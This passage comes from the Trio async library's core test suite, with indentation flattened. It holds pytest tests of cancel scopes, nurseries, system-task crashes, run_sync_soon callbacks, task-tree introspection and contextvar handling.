nursery = await nursery_mgr.__aenter__()
try:
nursery.start_soon(task1)
nursery.start_soon(task2)
nursery.start_soon(sleep_forever)
await wait_all_tasks_blocked()
nursery.cancel_scope.__exit__(None, None, None)
finally:
with pytest.raises(RuntimeError) as exc_info:
await nursery_mgr.__aexit__(*sys.exc_info())
assert "which had already been exited" in str(exc_info.value)
assert type(exc_info.value.__context__) is _core.MultiError
assert len(exc_info.value.__context__.exceptions) == 3
cancelled_in_context = False
for exc in exc_info.value.__context__.exceptions:
assert isinstance(exc, RuntimeError)
assert "closed before the task exited" in str(exc)
cancelled_in_context |= isinstance(exc.__context__, _core.Cancelled)
assert cancelled_in_context # for the sleep_forever
# Trying to exit a cancel scope from an unrelated task raises an error
# without affecting any state
async def task3(task_status):
with _core.CancelScope() as scope:
task_status.started(scope)
await sleep_forever()
async with _core.open_nursery() as nursery:
scope = await nursery.start(task3)
with pytest.raises(RuntimeError, match="from unrelated"):
scope.__exit__(None, None, None)
scope.cancel()
@slow
async def test_timekeeping():
# probably a good idea to use a real clock for *one* test anyway...
TARGET = 1.0
# give it a few tries in case of random CI server flakiness
for _ in range(4):
real_start = time.perf_counter()
with _core.CancelScope() as scope:
scope.deadline = _core.current_time() + TARGET
await sleep_forever()
real_duration = time.perf_counter() - real_start
accuracy = real_duration / TARGET
print(accuracy)
# Actual time elapsed should always be >= target time
        # (== is possible depending on system behavior for time.perf_counter resolution)
if 1.0 <= accuracy < 2: # pragma: no branch
break
else: # pragma: no cover
assert False
async def test_failed_abort():
stubborn_task = [None]
stubborn_scope = [None]
record = []
async def stubborn_sleeper():
stubborn_task[0] = _core.current_task()
with _core.CancelScope() as scope:
stubborn_scope[0] = scope
record.append("sleep")
x = await _core.wait_task_rescheduled(lambda _: _core.Abort.FAILED)
assert x == 1
record.append("woke")
try:
await _core.checkpoint_if_cancelled()
except _core.Cancelled:
record.append("cancelled")
async with _core.open_nursery() as nursery:
nursery.start_soon(stubborn_sleeper)
await wait_all_tasks_blocked()
assert record == ["sleep"]
stubborn_scope[0].cancel()
await wait_all_tasks_blocked()
# cancel didn't wake it up
assert record == ["sleep"]
# wake it up again by hand
_core.reschedule(stubborn_task[0], outcome.Value(1))
assert record == ["sleep", "woke", "cancelled"]
@restore_unraisablehook()
def test_broken_abort():
async def main():
# These yields are here to work around an annoying warning -- we're
# going to crash the main loop, and if we (by chance) do this before
# the run_sync_soon task runs for the first time, then Python gives us
# a spurious warning about it not being awaited. (I mean, the warning
# is correct, but here we're testing our ability to deliver a
# semi-meaningful error after things have gone totally pear-shaped, so
# it's not relevant.) By letting the run_sync_soon_task run first, we
# avoid the warning.
await _core.checkpoint()
await _core.checkpoint()
with _core.CancelScope() as scope:
scope.cancel()
# None is not a legal return value here
await _core.wait_task_rescheduled(lambda _: None)
with pytest.raises(_core.TrioInternalError):
_core.run(main)
# Because this crashes, various __del__ methods print complaints on
# stderr. Make sure that they get run now, so the output is attached to
# this test.
gc_collect_harder()
@restore_unraisablehook()
def test_error_in_run_loop():
# Blow stuff up real good to check we at least get a TrioInternalError
async def main():
task = _core.current_task()
task._schedule_points = "hello!"
await _core.checkpoint()
with ignore_coroutine_never_awaited_warnings():
with pytest.raises(_core.TrioInternalError):
_core.run(main)
async def test_spawn_system_task():
record = []
async def system_task(x):
record.append(("x", x))
record.append(("ki", _core.currently_ki_protected()))
await _core.checkpoint()
_core.spawn_system_task(system_task, 1)
await wait_all_tasks_blocked()
assert record == [("x", 1), ("ki", True)]
# intentionally make a system task crash
def test_system_task_crash():
async def crasher():
raise KeyError
async def main():
_core.spawn_system_task(crasher)
await sleep_forever()
with pytest.raises(_core.TrioInternalError):
_core.run(main)
def test_system_task_crash_MultiError():
async def crasher1():
raise KeyError
async def crasher2():
raise ValueError
async def system_task():
async with _core.open_nursery() as nursery:
nursery.start_soon(crasher1)
nursery.start_soon(crasher2)
async def main():
_core.spawn_system_task(system_task)
await sleep_forever()
with pytest.raises(_core.TrioInternalError) as excinfo:
_core.run(main)
me = excinfo.value.__cause__
assert isinstance(me, _core.MultiError)
assert len(me.exceptions) == 2
for exc in me.exceptions:
assert isinstance(exc, (KeyError, ValueError))
def test_system_task_crash_plus_Cancelled():
# Set up a situation where a system task crashes with a
# MultiError([Cancelled, ValueError])
async def crasher():
try:
await sleep_forever()
except _core.Cancelled:
raise ValueError
async def cancelme():
await sleep_forever()
async def system_task():
async with _core.open_nursery() as nursery:
nursery.start_soon(crasher)
nursery.start_soon(cancelme)
async def main():
_core.spawn_system_task(system_task)
# then we exit, triggering a cancellation
with pytest.raises(_core.TrioInternalError) as excinfo:
_core.run(main)
assert type(excinfo.value.__cause__) is ValueError
def test_system_task_crash_KeyboardInterrupt():
async def ki():
raise KeyboardInterrupt
async def main():
_core.spawn_system_task(ki)
await sleep_forever()
with pytest.raises(_core.TrioInternalError) as excinfo:
_core.run(main)
assert isinstance(excinfo.value.__cause__, KeyboardInterrupt)
# This used to fail because checkpoint was a yield followed by an immediate
# reschedule. So we had:
# 1) this task yields
# 2) this task is rescheduled
# ...
# 3) next iteration of event loop starts, runs timeouts
# 4) this task has timed out
# 5) ...but it's on the run queue, so the timeout is queued to be delivered
# the next time that it's blocked.
async def test_yield_briefly_checks_for_timeout(mock_clock):
with _core.CancelScope(deadline=_core.current_time() + 5):
await _core.checkpoint()
with pytest.raises(_core.Cancelled):
mock_clock.jump(10)
await _core.checkpoint()
# This tests that sys.exc_info is properly saved/restored as we swap between
# tasks. It turns out that the interpreter automagically handles this for us
# so there's no special code in Trio required to pass this test, but it's
# still nice to know that it works :-).
#
# Update: it turns out I was right to be nervous! see the next test...
async def test_exc_info():
record = []
seq = Sequencer()
async def child1():
with pytest.raises(ValueError) as excinfo:
try:
async with seq(0):
pass # we don't yield until seq(2) below
record.append("child1 raise")
raise ValueError("child1")
except ValueError:
record.append("child1 sleep")
async with seq(2):
pass
assert "child2 wake" in record
record.append("child1 re-raise")
raise
assert excinfo.value.__context__ is None
record.append("child1 success")
async def child2():
with pytest.raises(KeyError) as excinfo:
async with seq(1):
pass # we don't yield until seq(3) below
assert "child1 sleep" in record
record.append("child2 wake")
assert sys.exc_info() == (None, None, None)
try:
raise KeyError("child2")
except KeyError:
record.append("child2 sleep again")
async with seq(3):
pass
assert "child1 re-raise" in record
record.append("child2 re-raise")
raise
assert excinfo.value.__context__ is None
record.append("child2 success")
async with _core.open_nursery() as nursery:
nursery.start_soon(child1)
nursery.start_soon(child2)
assert record == [
"child1 raise",
"child1 sleep",
"child2 wake",
"child2 sleep again",
"child1 re-raise",
"child1 success",
"child2 re-raise",
"child2 success",
]
# Before CPython 3.9, using .throw() to raise an exception inside a
# coroutine/generator causes the original exc_info state to be lost, so things
# like re-raising and exception chaining are broken.
#
# https://bugs.python.org/issue29587
async def test_exc_info_after_yield_error():
child_task = None
async def child():
nonlocal child_task
child_task = _core.current_task()
try:
raise KeyError
except Exception:
try:
await sleep_forever()
except Exception:
pass
raise
with pytest.raises(KeyError):
async with _core.open_nursery() as nursery:
nursery.start_soon(child)
await wait_all_tasks_blocked()
_core.reschedule(child_task, outcome.Error(ValueError()))
# Similar to previous test -- if the ValueError() gets sent in via 'throw',
# then Python's normal implicit chaining stuff is broken.
async def test_exception_chaining_after_yield_error():
child_task = None
async def child():
nonlocal child_task
child_task = _core.current_task()
try:
raise KeyError
except Exception:
await sleep_forever()
with pytest.raises(ValueError) as excinfo:
async with _core.open_nursery() as nursery:
nursery.start_soon(child)
await wait_all_tasks_blocked()
_core.reschedule(child_task, outcome.Error(ValueError()))
assert isinstance(excinfo.value.__context__, KeyError)
async def test_nursery_exception_chaining_doesnt_make_context_loops():
async def crasher():
raise KeyError
with pytest.raises(_core.MultiError) as excinfo:
async with _core.open_nursery() as nursery:
nursery.start_soon(crasher)
raise ValueError
# the MultiError should not have the KeyError or ValueError as context
assert excinfo.value.__context__ is None
def test_TrioToken_identity():
async def get_and_check_token():
token = _core.current_trio_token()
# Two calls in the same run give the same object
assert token is _core.current_trio_token()
return token
t1 = _core.run(get_and_check_token)
t2 = _core.run(get_and_check_token)
assert t1 is not t2
assert t1 != t2
assert hash(t1) != hash(t2)
async def test_TrioToken_run_sync_soon_basic():
record = []
def cb(x):
record.append(("cb", x))
token = _core.current_trio_token()
token.run_sync_soon(cb, 1)
assert not record
await wait_all_tasks_blocked()
assert record == [("cb", 1)]
def test_TrioToken_run_sync_soon_too_late():
token = None
async def main():
nonlocal token
token = _core.current_trio_token()
_core.run(main)
assert token is not None
with pytest.raises(_core.RunFinishedError):
token.run_sync_soon(lambda: None) # pragma: no branch
async def test_TrioToken_run_sync_soon_idempotent():
record = []
def cb(x):
record.append(x)
token = _core.current_trio_token()
token.run_sync_soon(cb, 1)
token.run_sync_soon(cb, 1, idempotent=True)
token.run_sync_soon(cb, 1, idempotent=True)
token.run_sync_soon(cb, 1, idempotent=True)
token.run_sync_soon(cb, 2, idempotent=True)
token.run_sync_soon(cb, 2, idempotent=True)
await wait_all_tasks_blocked()
assert len(record) == 3
assert sorted(record) == [1, 1, 2]
# ordering test
record = []
for _ in range(3):
for i in range(100):
token.run_sync_soon(cb, i, idempotent=True)
await wait_all_tasks_blocked()
# We guarantee FIFO
assert record == list(range(100))
def test_TrioToken_run_sync_soon_idempotent_requeue():
# We guarantee that if a call has finished, queueing it again will call it
# again. Due to the lack of synchronization, this effectively means that
# we have to guarantee that once a call has *started*, queueing it again
# will call it again. Also this is much easier to test :-)
record = []
def redo(token):
record.append(None)
try:
token.run_sync_soon(redo, token, idempotent=True)
except _core.RunFinishedError:
pass
async def main():
token = _core.current_trio_token()
token.run_sync_soon(redo, token, idempotent=True)
await _core.checkpoint()
await _core.checkpoint()
await _core.checkpoint()
_core.run(main)
assert len(record) >= 2
def test_TrioToken_run_sync_soon_after_main_crash():
record = []
async def main():
token = _core.current_trio_token()
# After main exits but before finally cleaning up, callback processed
# normally
token.run_sync_soon(lambda: record.append("sync-cb"))
raise ValueError
with pytest.raises(ValueError):
_core.run(main)
assert record == ["sync-cb"]
def test_TrioToken_run_sync_soon_crashes():
record = set()
async def main():
token = _core.current_trio_token()
token.run_sync_soon(lambda: dict()["nope"])
# check that a crashing run_sync_soon callback doesn't stop further
# calls to run_sync_soon
token.run_sync_soon(lambda: record.add("2nd run_sync_soon ran"))
try:
await sleep_forever()
except _core.Cancelled:
record.add("cancelled!")
with pytest.raises(_core.TrioInternalError) as excinfo:
_core.run(main)
assert type(excinfo.value.__cause__) is KeyError
assert record == {"2nd run_sync_soon ran", "cancelled!"}
async def test_TrioToken_run_sync_soon_FIFO():
N = 100
record = []
token = _core.current_trio_token()
for i in range(N):
token.run_sync_soon(lambda j: record.append(j), i)
await wait_all_tasks_blocked()
assert record == list(range(N))
def test_TrioToken_run_sync_soon_starvation_resistance():
# Even if we push callbacks in from callbacks, so that the callback queue
# never empties out, then we still can't starve out other tasks from
# running.
token = None
record = []
def naughty_cb(i):
nonlocal token
try:
token.run_sync_soon(naughty_cb, i + 1)
except _core.RunFinishedError:
record.append(("run finished", i))
async def main():
nonlocal token
token = _core.current_trio_token()
token.run_sync_soon(naughty_cb, 0)
record.append("starting")
for _ in range(20):
await _core.checkpoint()
_core.run(main)
assert len(record) == 2
assert record[0] == "starting"
assert record[1][0] == "run finished"
assert record[1][1] >= 19
def test_TrioToken_run_sync_soon_threaded_stress_test():
cb_counter = 0
def cb():
nonlocal cb_counter
cb_counter += 1
def stress_thread(token):
try:
while True:
token.run_sync_soon(cb)
time.sleep(0)
except _core.RunFinishedError:
pass
async def main():
token = _core.current_trio_token()
thread = threading.Thread(target=stress_thread, args=(token,))
thread.start()
for _ in range(10):
start_value = cb_counter
while cb_counter == start_value:
await sleep(0.01)
_core.run(main)
print(cb_counter)
async def test_TrioToken_run_sync_soon_massive_queue():
# There are edge cases in the wakeup fd code when the wakeup fd overflows,
# so let's try to make that happen. This is also just a good stress test
# in general. (With the current-as-of-2017-02-14 code using a socketpair
# with minimal buffer, Linux takes 6 wakeups to fill the buffer and macOS
# takes 1 wakeup. So 1000 is overkill if anything. Windows OTOH takes
# ~600,000 wakeups, but has the same code paths...)
COUNT = 1000
token = _core.current_trio_token()
counter = [0]
def cb(i):
# This also tests FIFO ordering of callbacks
assert counter[0] == i
counter[0] += 1
for i in range(COUNT):
token.run_sync_soon(cb, i)
await wait_all_tasks_blocked()
assert counter[0] == COUNT
@pytest.mark.skipif(buggy_pypy_asyncgens, reason="PyPy 7.2 is buggy")
def test_TrioToken_run_sync_soon_late_crash():
# Crash after system nursery is closed -- easiest way to do that is
# from an async generator finalizer.
record = []
saved = []
async def agen():
token = _core.current_trio_token()
try:
yield 1
finally:
token.run_sync_soon(lambda: {}["nope"])
token.run_sync_soon(lambda: record.append("2nd ran"))
async def main():
saved.append(agen())
await saved[-1].asend(None)
record.append("main exiting")
with pytest.raises(_core.TrioInternalError) as excinfo:
_core.run(main)
assert type(excinfo.value.__cause__) is KeyError
assert record == ["main exiting", "2nd ran"]
async def test_slow_abort_basic():
with _core.CancelScope() as scope:
scope.cancel()
with pytest.raises(_core.Cancelled):
task = _core.current_task()
token = _core.current_trio_token()
def slow_abort(raise_cancel):
result = outcome.capture(raise_cancel)
token.run_sync_soon(_core.reschedule, task, result)
return _core.Abort.FAILED
await _core.wait_task_rescheduled(slow_abort)
async def test_slow_abort_edge_cases():
record = []
async def slow_aborter():
task = _core.current_task()
token = _core.current_trio_token()
def slow_abort(raise_cancel):
record.append("abort-called")
result = outcome.capture(raise_cancel)
token.run_sync_soon(_core.reschedule, task, result)
return _core.Abort.FAILED
with pytest.raises(_core.Cancelled):
record.append("sleeping")
await _core.wait_task_rescheduled(slow_abort)
record.append("cancelled")
# blocking again, this time it's okay, because we're shielded
await _core.checkpoint()
record.append("done")
with _core.CancelScope() as outer1:
with _core.CancelScope() as outer2:
async with _core.open_nursery() as nursery:
# So we have a task blocked on an operation that can't be
# aborted immediately
nursery.start_soon(slow_aborter)
await wait_all_tasks_blocked()
assert record == ["sleeping"]
# And then we cancel it, so the abort callback gets run
outer1.cancel()
assert record == ["sleeping", "abort-called"]
# In fact that happens twice! (This used to cause the abort
# callback to be run twice)
outer2.cancel()
assert record == ["sleeping", "abort-called"]
# But then before the abort finishes, the task gets shielded!
nursery.cancel_scope.shield = True
# Now we wait for the task to finish...
# The cancellation was delivered, even though it was shielded
assert record == ["sleeping", "abort-called", "cancelled", "done"]
async def test_task_tree_introspection():
tasks = {}
nurseries = {}
async def parent(task_status=_core.TASK_STATUS_IGNORED):
tasks["parent"] = _core.current_task()
assert tasks["parent"].child_nurseries == []
async with _core.open_nursery() as nursery1:
async with _core.open_nursery() as nursery2:
assert tasks["parent"].child_nurseries == [nursery1, nursery2]
assert tasks["parent"].child_nurseries == []
async with _core.open_nursery() as nursery:
nurseries["parent"] = nursery
await nursery.start(child1)
# Upward links survive after tasks/nurseries exit
assert nurseries["parent"].parent_task is tasks["parent"]
assert tasks["child1"].parent_nursery is nurseries["parent"]
assert nurseries["child1"].parent_task is tasks["child1"]
assert tasks["child2"].parent_nursery is nurseries["child1"]
nursery = _core.current_task().parent_nursery
# Make sure that chaining eventually gives a nursery of None (and not,
# for example, an error)
while nursery is not None:
t = nursery.parent_task
nursery = t.parent_nursery
async def child2():
tasks["child2"] = _core.current_task()
assert tasks["parent"].child_nurseries == [nurseries["parent"]]
assert nurseries["parent"].child_tasks == frozenset({tasks["child1"]})
assert tasks["child1"].child_nurseries == [nurseries["child1"]]
assert nurseries["child1"].child_tasks == frozenset({tasks["child2"]})
assert tasks["child2"].child_nurseries == []
async def child1(task_status=_core.TASK_STATUS_IGNORED):
me = tasks["child1"] = _core.current_task()
assert me.parent_nursery.parent_task is tasks["parent"]
assert me.parent_nursery is not nurseries["parent"]
assert me.eventual_parent_nursery is nurseries["parent"]
task_status.started()
assert me.parent_nursery is nurseries["parent"]
assert me.eventual_parent_nursery is None
# Wait for the start() call to return and close its internal nursery, to
# ensure consistent results in child2:
await _core.wait_all_tasks_blocked()
async with _core.open_nursery() as nursery:
nurseries["child1"] = nursery
nursery.start_soon(child2)
async with _core.open_nursery() as nursery:
nursery.start_soon(parent)
# There are no pending starts, so no one should have a non-None
# eventual_parent_nursery
for task in tasks.values():
assert task.eventual_parent_nursery is None
async def test_nursery_closure():
async def child1(nursery):
# We can add new tasks to the nursery even after entering __aexit__,
# so long as there are still tasks running
nursery.start_soon(child2)
async def child2():
pass
async with _core.open_nursery() as nursery:
nursery.start_soon(child1, nursery)
# But once we've left __aexit__, the nursery is closed
with pytest.raises(RuntimeError):
nursery.start_soon(child2)
async def test_spawn_name():
async def func1(expected):
task = _core.current_task()
assert expected in task.name
async def func2(): # pragma: no cover
pass
async with _core.open_nursery() as nursery:
for spawn_fn in [nursery.start_soon, _core.spawn_system_task]:
spawn_fn(func1, "func1")
spawn_fn(func1, "func2", name=func2)
spawn_fn(func1, "func3", name="func3")
spawn_fn(functools.partial(func1, "func1"))
spawn_fn(func1, "object", name=object())
async def test_current_effective_deadline(mock_clock):
assert _core.current_effective_deadline() == inf
with _core.CancelScope(deadline=5) as scope1:
with _core.CancelScope(deadline=10) as scope2:
assert _core.current_effective_deadline() == 5
scope2.deadline = 3
assert _core.current_effective_deadline() == 3
scope2.deadline = 10
assert _core.current_effective_deadline() == 5
scope2.shield = True
assert _core.current_effective_deadline() == 10
scope2.shield = False
assert _core.current_effective_deadline() == 5
scope1.cancel()
assert _core.current_effective_deadline() == -inf
scope2.shield = True
assert _core.current_effective_deadline() == 10
assert _core.current_effective_deadline() == -inf
assert _core.current_effective_deadline() == inf
def test_nice_error_on_bad_calls_to_run_or_spawn():
def bad_call_run(*args):
_core.run(*args)
def bad_call_spawn(*args):
async def main():
async with _core.open_nursery() as nursery:
nursery.start_soon(*args)
_core.run(main)
for bad_call in bad_call_run, bad_call_spawn:
async def f(): # pragma: no cover
pass
with pytest.raises(TypeError, match="expecting an async function"):
bad_call(f())
async def async_gen(arg): # pragma: no cover
yield arg
with pytest.raises(
TypeError, match="expected an async function but got an async generator"
):
bad_call(async_gen, 0)
def test_calling_asyncio_function_gives_nice_error():
async def child_xyzzy():
await create_asyncio_future_in_new_loop()
async def misguided():
await child_xyzzy()
with pytest.raises(TypeError) as excinfo:
_core.run(misguided)
assert "asyncio" in str(excinfo.value)
# The traceback should point to the location of the foreign await
assert any( # pragma: no branch
entry.name == "child_xyzzy" for entry in excinfo.traceback
)
async def test_asyncio_function_inside_nursery_does_not_explode():
# Regression test for https://github.com/python-trio/trio/issues/552
with pytest.raises(TypeError) as excinfo:
async with _core.open_nursery() as nursery:
import asyncio
nursery.start_soon(sleep_forever)
await create_asyncio_future_in_new_loop()
assert "asyncio" in str(excinfo.value)
async def test_trivial_yields():
with assert_checkpoints():
await _core.checkpoint()
with assert_checkpoints():
await _core.checkpoint_if_cancelled()
await _core.cancel_shielded_checkpoint()
with assert_checkpoints():
async with _core.open_nursery():
pass
with _core.CancelScope() as cancel_scope:
cancel_scope.cancel()
with pytest.raises(_core.MultiError) as excinfo:
async with _core.open_nursery():
raise KeyError
assert len(excinfo.value.exceptions) == 2
assert {type(e) for e in excinfo.value.exceptions} == {
KeyError,
_core.Cancelled,
}
async def test_nursery_start(autojump_clock):
async def no_args(): # pragma: no cover
pass
# Errors in calling convention get raised immediately from start
async with _core.open_nursery() as nursery:
with pytest.raises(TypeError):
await nursery.start(no_args)
async def sleep_then_start(seconds, *, task_status=_core.TASK_STATUS_IGNORED):
repr(task_status) # smoke test
await sleep(seconds)
task_status.started(seconds)
await sleep(seconds)
# Basic happy-path check: start waits for the task to call started(), then
# returns, passes back the value, and the given nursery then waits for it
# to exit.
for seconds in [1, 2]:
async with _core.open_nursery() as nursery:
assert len(nursery.child_tasks) == 0
t0 = _core.current_time()
assert await nursery.start(sleep_then_start, seconds) == seconds
assert _core.current_time() - t0 == seconds
assert len(nursery.child_tasks) == 1
assert _core.current_time() - t0 == 2 * seconds
# Make sure TASK_STATUS_IGNORED works so task function can be called
# directly
t0 = _core.current_time()
await sleep_then_start(3)
assert _core.current_time() - t0 == 2 * 3
# calling started twice
async def double_started(task_status=_core.TASK_STATUS_IGNORED):
task_status.started()
with pytest.raises(RuntimeError):
task_status.started()
async with _core.open_nursery() as nursery:
await nursery.start(double_started)
# child crashes before calling started -> error comes out of .start()
async def raise_keyerror(task_status=_core.TASK_STATUS_IGNORED):
raise KeyError("oops")
async with _core.open_nursery() as nursery:
with pytest.raises(KeyError):
await nursery.start(raise_keyerror)
# child exiting cleanly before calling started -> triggers a RuntimeError
async def nothing(task_status=_core.TASK_STATUS_IGNORED):
return
async with _core.open_nursery() as nursery:
with pytest.raises(RuntimeError) as excinfo:
await nursery.start(nothing)
assert "exited without calling" in str(excinfo.value)
# if the call to start() is cancelled, then the call to started() does
# nothing -- the child keeps executing under start(). The value it passed
# is ignored; start() raises Cancelled.
async def just_started(task_status=_core.TASK_STATUS_IGNORED):
task_status.started("hi")
async with _core.open_nursery() as nursery:
with _core.CancelScope() as cs:
cs.cancel()
with pytest.raises(_core.Cancelled):
await nursery.start(just_started)
# and if after the no-op started(), the child crashes, the error comes out
# of start()
async def raise_keyerror_after_started(task_status=_core.TASK_STATUS_IGNORED):
task_status.started()
raise KeyError("whoopsiedaisy")
async with _core.open_nursery() as nursery:
with _core.CancelScope() as cs:
cs.cancel()
with pytest.raises(_core.MultiError) as excinfo:
await nursery.start(raise_keyerror_after_started)
assert {type(e) for e in excinfo.value.exceptions} == {
_core.Cancelled,
KeyError,
}
# trying to start in a closed nursery raises an error immediately
async with _core.open_nursery() as closed_nursery:
pass
t0 = _core.current_time()
with pytest.raises(RuntimeError):
await closed_nursery.start(sleep_then_start, 7)
assert _core.current_time() == t0
async def test_task_nursery_stack():
task = _core.current_task()
assert task._child_nurseries == []
async with _core.open_nursery() as nursery1:
assert task._child_nurseries == [nursery1]
with pytest.raises(KeyError):
async with _core.open_nursery() as nursery2:
assert task._child_nurseries == [nursery1, nursery2]
raise KeyError
assert task._child_nurseries == [nursery1]
assert task._child_nurseries == []
async def test_nursery_start_with_cancelled_nursery():
# This function isn't testing task_status, it's using task_status as a
# convenient way to get a nursery that we can test spawning stuff into.
async def setup_nursery(task_status=_core.TASK_STATUS_IGNORED):
async with _core.open_nursery() as nursery:
task_status.started(nursery)
await sleep_forever()
# Calls started() while children are asleep, so we can make sure
# that the cancellation machinery notices and aborts when a sleeping task
# is moved into a cancelled scope.
async def sleeping_children(fn, *, task_status=_core.TASK_STATUS_IGNORED):
async with _core.open_nursery() as nursery:
nursery.start_soon(sleep_forever)
nursery.start_soon(sleep_forever)
await wait_all_tasks_blocked()
fn()
task_status.started()
# Cancelling the setup_nursery just *before* calling started()
async with _core.open_nursery() as nursery:
target_nursery = await nursery.start(setup_nursery)
await target_nursery.start(
sleeping_children, target_nursery.cancel_scope.cancel
)
# Cancelling the setup_nursery just *after* calling started()
async with _core.open_nursery() as nursery:
target_nursery = await nursery.start(setup_nursery)
await target_nursery.start(sleeping_children, lambda: None)
target_nursery.cancel_scope.cancel()
async def test_nursery_start_keeps_nursery_open(autojump_clock):
async def sleep_a_bit(task_status=_core.TASK_STATUS_IGNORED):
await sleep(2)
task_status.started()
await sleep(3)
async with _core.open_nursery() as nursery1:
t0 = _core.current_time()
async with _core.open_nursery() as nursery2:
# Start the 'start' call running in the background
nursery1.start_soon(nursery2.start, sleep_a_bit)
# Sleep a bit
await sleep(1)
# Start another one.
nursery1.start_soon(nursery2.start, sleep_a_bit)
# Then exit this nursery. At this point, there are no tasks
# present in this nursery -- the only thing keeping it open is
# that the tasks will be placed into it soon, when they call
# started().
assert _core.current_time() - t0 == 6
# Check that it still works even if the task that the nursery is waiting
# for ends up crashing, and never actually enters the nursery.
async def sleep_then_crash(task_status=_core.TASK_STATUS_IGNORED):
await sleep(7)
raise KeyError
async def start_sleep_then_crash(nursery):
with pytest.raises(KeyError):
await nursery.start(sleep_then_crash)
async with _core.open_nursery() as nursery1:
t0 = _core.current_time()
async with _core.open_nursery() as nursery2:
nursery1.start_soon(start_sleep_then_crash, nursery2)
await wait_all_tasks_blocked()
assert _core.current_time() - t0 == 7
async def test_nursery_explicit_exception():
with pytest.raises(KeyError):
async with _core.open_nursery():
raise KeyError()
async def test_nursery_stop_iteration():
async def fail():
raise ValueError
try:
async with _core.open_nursery() as nursery:
nursery.start_soon(fail)
raise StopIteration
except _core.MultiError as e:
assert tuple(map(type, e.exceptions)) == (StopIteration, ValueError)
async def test_nursery_stop_async_iteration():
class it:
def __init__(self, count):
self.count = count
self.val = 0
async def __anext__(self):
await sleep(0)
val = self.val
if val >= self.count:
raise StopAsyncIteration
self.val += 1
return val
class async_zip:
def __init__(self, *largs):
self.nexts = [obj.__anext__ for obj in largs]
async def _accumulate(self, f, items, i):
items[i] = await f()
def __aiter__(self):
return self
async def __anext__(self):
nexts = self.nexts
items = [None] * len(nexts)
got_stop = False
def handle(exc):
nonlocal got_stop
if isinstance(exc, StopAsyncIteration):
got_stop = True
return None
else: # pragma: no cover
return exc
with _core.MultiError.catch(handle):
async with _core.open_nursery() as nursery:
for i, f in enumerate(nexts):
nursery.start_soon(self._accumulate, f, items, i)
if got_stop:
raise StopAsyncIteration
return items
result = []
async for vals in async_zip(it(4), it(2)):
result.append(vals)
assert result == [[0, 0], [1, 1]]
async def test_traceback_frame_removal():
async def my_child_task():
raise KeyError()
try:
# Trick: For now cancel/nursery scopes still leave a bunch of tb gunk
# behind. But if there's a MultiError, they leave it on the MultiError,
# which lets us get a clean look at the KeyError itself. Someday I
# guess this will always be a MultiError (#611), but for now we can
# force it by raising two exceptions.
async with _core.open_nursery() as nursery:
nursery.start_soon(my_child_task)
nursery.start_soon(my_child_task)
except _core.MultiError as exc:
first_exc = exc.exceptions[0]
assert isinstance(first_exc, KeyError)
# The top frame in the exception traceback should be inside the child
# task, not trio/contextvars internals. And there's only one frame
# inside the child task, so this will also detect if our frame-removal
# is too eager.
frame = first_exc.__traceback__.tb_frame
assert frame.f_code is my_child_task.__code__
def test_contextvar_support():
var = contextvars.ContextVar("test")
var.set("before")
assert var.get() == "before"
async def inner():
task = _core.current_task()
assert task.context.get(var) == "before"
assert var.get() == "before"
var.set("after")
assert var.get() == "after"
assert var in task.context
assert task.context.get(var) == "after"
_core.run(inner)
assert var.get() == "before"
async def test_contextvar_multitask():
var = contextvars.ContextVar("test", default="hmmm")
async def t1():
assert var.get() == "hmmm"
var.set("hmmmm")
assert var.get() == "hmmmm"
async def t2():
assert var.get() == "hmmmm"
async with _core.open_nursery() as n:
n.start_soon(t1)
await wait_all_tasks_blocked()
assert var.get() == "hmmm"
var.set("hmmmm")
n.start_soon(t2)
await wait_all_tasks_blocked()
def test_system_task_contexts():
cvar = contextvars.ContextVar("qwilfish")
cvar.set("water")
async def system_task():
assert cvar.get() == "water"
async def regular_task():
assert cvar.get() == "poison"
async def inner():
async with _core.open_nursery() as nursery:
cvar.set("poison")
nursery.start_soon(regular_task)
_core.spawn_system_task(system_task)
await wait_all_tasks_blocked()
_core.run(inner)
def test_Nursery_init():
with pytest.raises(TypeError):
_core._run.Nursery(None, None)
async def test_Nursery_private_init():
# context manager creation should not raise
async with _core.open_nursery() as nursery:
assert False == nursery._closed
def test_Nursery_subclass():
with pytest.raises(TypeError):
class Subclass(_core._run.Nursery):
pass
def test_Cancelled_init():
with pytest.raises(TypeError):
raise _core.Cancelled
with pytest.raises(TypeError):
_core.Cancelled()
# private constructor should not raise
_core.Cancelled._create()
def test_Cancelled_str():
cancelled = _core.Cancelled._create()
assert str(cancelled) == "Cancelled"
def test_Cancelled_subclass():
with pytest.raises(TypeError):
class Subclass(_core.Cancelled):
pass
def test_CancelScope_subclass():
with pytest.raises(TypeError):
class Subclass(_core.CancelScope):
pass
def test_sniffio_integration():
with pytest.raises(sniffio.AsyncLibraryNotFoundError):
sniffio.current_async_library()
async def check_inside_trio():
assert sniffio.current_async_library() == "trio"
_core.run(check_inside_trio)
with pytest.raises(sniffio.AsyncLibraryNotFoundError):
sniffio.current_async_library()
async def test_Task_custom_sleep_data():
task = _core.current_task()
assert task.custom_sleep_data is None
task.custom_sleep_data = 1
assert task.custom_sleep_data == 1
await _core.checkpoint()
assert task.custom_sleep_data is None
@types.coroutine
def async_yield(value):
yield value
async def test_permanently_detach_coroutine_object():
task = None
pdco_outcome = None
async def detachable_coroutine(task_outcome, yield_value):
await sleep(0)
nonlocal task, pdco_outcome
task = _core.current_task()
pdco_outcome = await outcome.acapture(
_core.permanently_detach_coroutine_object, task_outcome
)
await async_yield(yield_value)
async with _core.open_nursery() as nursery:
nursery.start_soon(detachable_coroutine, outcome.Value(None), "I'm free!")
# If we get here then Trio thinks the task has exited... but the coroutine
# is still iterable
assert pdco_outcome is None
assert task.coro.send("be free!") == "I'm free!"
assert pdco_outcome == outcome.Value("be free!")
with pytest.raises(StopIteration):
task.coro.send(None)
# Check the exception paths too
task = None
pdco_outcome = None
with pytest.raises(KeyError):
async with _core.open_nursery() as nursery:
nursery.start_soon(detachable_coroutine, outcome.Error(KeyError()), "uh oh")
throw_in = ValueError()
assert task.coro.throw(throw_in) == "uh oh"
assert pdco_outcome == outcome.Error(throw_in)
with pytest.raises(StopIteration):
task.coro.send(None)
async def bad_detach():
async with _core.open_nursery():
with pytest.raises(RuntimeError) as excinfo:
await _core.permanently_detach_coroutine_object(outcome.Value(None))
assert "open nurser" in str(excinfo.value)
async with _core.open_nursery() as nursery:
nursery.start_soon(bad_detach)
async def test_detach_and_reattach_coroutine_object():
unrelated_task = None
task = None
async def unrelated_coroutine():
nonlocal unrelated_task
unrelated_task = _core.current_task()
async def reattachable_coroutine():
await sleep(0)
nonlocal task
